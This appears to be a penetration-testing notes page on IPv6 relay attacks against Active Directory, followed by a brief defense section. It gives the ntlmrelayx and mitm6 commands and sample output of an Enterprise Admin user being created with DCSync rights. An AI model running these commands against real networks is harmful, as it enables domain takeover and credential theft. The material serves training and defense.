IPv6 Attacks

Attacks

NTLMRelayx

First, we need to start NTLMRelayx in IPv6 mode:

$ ntlmrelayx -6 -t ldaps://[DC] -wh fakewpad.[domain] -l lootme

MITM6

Now we need to start mitm6:

$ sudo mitm6 -d [dc domain] --no-ra

Once an event occurs (login, reboot, etc) information will be relayed. If a administrator logs in, ntlmrelayx will automatically create an Enterprise Admin user and give you credentials for it.

[*] User privileges found: Create user
[*] User privileges found: Adding user to a privileged group (Enterprise Admins)
[*] User privileges found: Modifying domain ACL
[*] Attempting to create user in: CN=Users,DC=marvel,DC=local
[*] Adding new user with username: CBjzTmNUUL and password: LXR4]`]#<6H,1~W result: OK
[*] Success! User CBjzTmNUUL now has Replication-Get-Changes-All privileges on the domain
[*] Try using DCSync with secretsdump.py and this user :)

Defense

Set Block rules

(Inbound) Core Networking - Dynamic Host Configuration Protocol for IPv6(DHCPV6-In)
(Inbound) Core Networking - Router Advertisement (ICMPv6-In)
(Outbound) Core Networking - Dynamic Host Configuration Protocol for IPv6(DHCPV6-Out)

Disable WPAD

If WPAD is not in use internally, disable it via Group Policy
- WinHttpAutoProxySvc service

Enable LDAP Signing and LDAP Channel Binding

PreviousSMB Relay Attacks NextPassback Attacks

Last updated 7 days ago